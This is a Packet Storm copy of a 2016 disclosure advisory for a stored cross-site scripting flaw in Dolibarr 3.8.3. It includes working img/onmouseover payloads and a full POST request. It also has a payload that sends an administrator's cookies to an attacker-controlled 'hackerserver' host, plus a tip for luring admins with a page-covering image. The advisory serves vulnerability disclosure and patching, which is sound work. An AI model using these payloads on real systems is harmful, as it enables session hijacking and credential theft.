accept no compromises

Dolibarr 3.8.3 Cross Site Scripting

Dolibarr 3.8.3 Cross Site Scripting
Posted Jan 11, 2016
Authored by Mickael Dorigny | Site synetis.com

Dolibarr version 3.8.3 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
MD5 | 06f1e26e3401e69cf528a8443feafb0e

Dolibarr 3.8.3 Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: XSS on dolibarr 3.8.3
# Date: 03/01/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: http://www.dolibarr.org/
# Category: XSS
######################################################################

Dolibarr description :
======================================================================
Dolibarr ERP & CRM is a modern and easy to use web software to manage your business (contacts, invoices, orders, products, stocks, agenda, emailings, etc...).

It's opensource and free software designed for small companies, foundations and freelances.
You can install and use it as a standalone application, or online on a mutualized or dedicated server to use it from anywhere. Dolibarr is also available on ready to use Cloud services.

Vulnerability description :
======================================================================
A Stored XSS is available in the Dolibarr 3.8.3 core code. No module needs to be activated to exploit this XSS vulnerability because an attacker can use the user attributes management to do it.

This XSS can be exploited through a basic user account on the dolibarr installation. Impacted users are administrators and users that have right to check other user's attributes.

PoC n°1 : Stored XSS in user attributes:
====================================
Once a simple user is connected with his account, he can modifiy his attributes like Last name, First name, Mobile number, etc.. These informations can be reviewed by other users who have administration privileges.

Note that some basic protection are present just after form submitting. These protection doesn't allow attacker to use basic JavaScript tips like "<script>" tags or "onerror" JavaScript. But some other events or still allowed.

Using the <IMG> HTML tag and the "onmouseover" JavaScript event, we can force an admin to pass his mouse over the injected image. This event can be used to execute valid JavaScript instructions in the administrator browser or in browser of other users allowed to check user's attributes.

PoC :
As an authenticated user, fullfill "Last name", "First name", "email", "job" or "signature" input with this :
user1<img src=x onmouseover=alert(1)>

[REQUEST]
http://server/dolibarr/htdocs/user/card.php?id=2
[POSTDATA]
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="token"
3e01b40f4659396870a384c16213e400
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="action"
update
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="entity"
1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="lastname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="firstname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="job"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="gender"
man
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="login"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="password"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="admin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="superadmin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_phone"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="user_mobile"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_fax"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="email"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="signature"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="fk_user"
-1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="weeklyhours"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="save"
Save
-----------------------------7677991721297181448923571907--

Note that "First name" and "Last name" input are displayed in the "List of users" page, but they are truncated after 50 characters. This trunctation limits available XSS payloads. We can use the "signature" input to insert more JavaScript instructions in the same HTML form. Admin will then see this signature when they will click on a user in the "List of users" to see all his attributes.

Image insertion can target an existent or a non existent image. A little tips to have more chance to trap an admin is to upload a very big image (like 1920*1080) that will cover all the website page.

Once attributes are modified. Another user like an admin can check your attributes and then execute JavaScript instruction by passing his mouse over the injected image. Here is another Poc that will send the admin's cookie on a website controled by an attacker using a GET HTTP request. Inject this payload in the "signature" input :
<img src=x onmouseover=document.location="http://hackerserver?c="+document.cookie+"">

Using this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such as cookies.


Screenshots :
======================================================================
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-03.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-04.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-05.jpg

Solution:
======================================================================

The fix concerning this vulnerability is available on Dolibarr github repository : https://github.com/Dolibarr/dolibarr/issues/4341 / https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56

Additional resources :
======================================================================
- https://www.youtube.com/watch?v=p2rFWJOCJC8
- http://www.information-security.fr/en/xss-dolibarr-version-3-8-3/
- https://github.com/Dolibarr/dolibarr/issues/4341
- https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56


Report timeline :
======================================================================
2016-01-03 : Editor informed for vulnerability
2016-01-07 : Vulnerability is fixed
2016-01-11 : Advisory

Credits :
======================================================================

88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security

Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    2 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close